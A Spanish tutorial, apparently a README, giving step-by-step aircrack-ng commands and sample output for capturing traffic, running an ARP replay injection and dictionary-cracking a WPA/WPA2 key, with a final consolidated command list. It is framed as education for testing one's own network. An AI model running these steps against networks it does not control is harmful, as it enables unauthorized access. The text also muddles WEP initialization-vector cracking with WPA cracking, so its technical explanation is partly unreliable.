Aircrack-ng es básicamente un paquete de software de red que ha sido diseñado para lograr los siguientes objetivos:
Tenga en cuenta que el presente tutorial no es una guía exhaustiva, sino que pretende desarrollar algunas habilidades básicas para probar la seguridad de su propia red y familiarizarse con los conceptos.
El ataque que se describe a continuación se basa en una técnica pasiva (ataque de repetición de solicitud ARP) y se centra en distribuciones basadas en Debian, suponiendo que tenga una tarjeta inalámbrica que funcione con controladores ya parcheados para inyección.
Aircrack-ng se puede instalar en un sistema operativo basado en Debian compilando el código fuente (para más detalles puedes visitar el sitio web oficial).
A continuación puede encontrar instrucciones para instalar los requisitos básicos para compilar aircrack-ng para sistemas operativos basados en Debian.
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
Obtenga la última copia de aircrack-ng:
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
Para construir aircrack-ng, se utiliza el sistema de construcción Autotools. Primero, ./configure
el proyecto para construir con las opciones apropiadas:
$ autoreconf -i
$ ./configure --with-experimental
A continuación, compile el proyecto con el comando make
y utilice el destino de "instalación" de los destinos adicionales que se enumeran a continuación para completar la instalación.
make check
make integration
make install
make uninstall
El propósito de este paso garantiza que su tarjeta admita correctamente la inyección. Suponiendo que el nombre de su interfaz es "wlan0" (puede recuperarlo escribiendo iwconfig
en la terminal), escriba el siguiente comando:
# aireplay-ng --test wlan0
El sistema responde:
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
Esto confirma que su tarjeta puede inyectar paquetes.
Lo primero que debe hacer es buscar un objetivo potencial que ponga su tarjeta inalámbrica en modo monitor usando airmon-ng
. Sin embargo, se recomienda encarecidamente kill
todos los procesos que interfieren antes de utilizar la suite aircrack-ng.
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
Luego, es posible habilitar el modo monitor utilizado para crear otra interfaz (mon0):
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
Notará que "wlan0" se ha puesto correctamente en modo monitor. Luego, inicia airodump-ng
para buscar redes:
# airodump-ng mon0
Localice la red inalámbrica que desea descifrar y anote su BSSID y canal en el siguiente resultado:
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
Tenga en cuenta que la parte superior del resultado enumera información sobre los AP dentro del alcance y la parte inferior enumera los clientes conectados a los AP correspondientes.
Abra otra sesión de consola para capturar los vectores iniciales generados por el objetivo y guardar el resultado en un archivo:
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
donde -c 10
es el canal para la red inalámbrica, --bssid 08:00:BF:E6:31:2E
es la dirección MAC del AP, -w output-file
define los archivos de salida que contendrán los vectores de inicialización, y mon0
es el nombre de la interfaz.
El sistema responde:
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
Después de la ejecución del comando se generarán varios archivos.
El clásico ataque de reproducción de solicitudes ARP es la forma más eficaz de generar nuevos vectores de inicialización y funciona de forma muy fiable. El propósito de este paso es iniciar aireplay-ng
en un modo que escuche las solicitudes ARP y luego las reinyecte al punto de acceso. Mantenga su airodump-ng
y aireplay-ng
en funcionamiento, abra otra terminal y ejecute el ataque de reproducción de solicitud ARP:
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
Puede comprobar si los paquetes se inyectan mirando la pantalla airodump-ng
.
En este punto, debería poder obtener la clave WPA de los vectores de inicialización recopilados en los pasos anteriores. Para realizar este ataque necesita una lista de palabras y si la contraseña de la red no está en el archivo de palabras, no podrá descifrarla. Tenga en cuenta que la mayoría de los enrutadores WPA/WPA2 vienen con contraseñas aleatorias seguras de 12 caracteres que muchos usuarios (con razón) dejan sin cambios. Si está intentando descifrar una de estas contraseñas, le recomiendo utilizar las listas de contraseñas de longitud WPA.
Abra otra sesión de consola y escriba:
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output * .cap
donde -a2
especifica el modo de ataque para WPA/WPA2-PSK, -w wordlist.txt
se refiere a su propia lista de palabras del diccionario y output*.cap
selecciona todos los archivos de salida con extensión .cap
.
Este es el resultado de un ataque exitoso:
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
A continuación puede encontrar la lista de todos los comandos necesarios para descifrar una red WPA/WPA2.
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
Este proyecto tiene la licencia MIT; consulte el archivo de LICENCIA para obtener más detalles.
Este tutorial se ha realizado únicamente con fines educativos, no promuevo prácticas maliciosas y no seré responsable de ninguna actividad ilegal.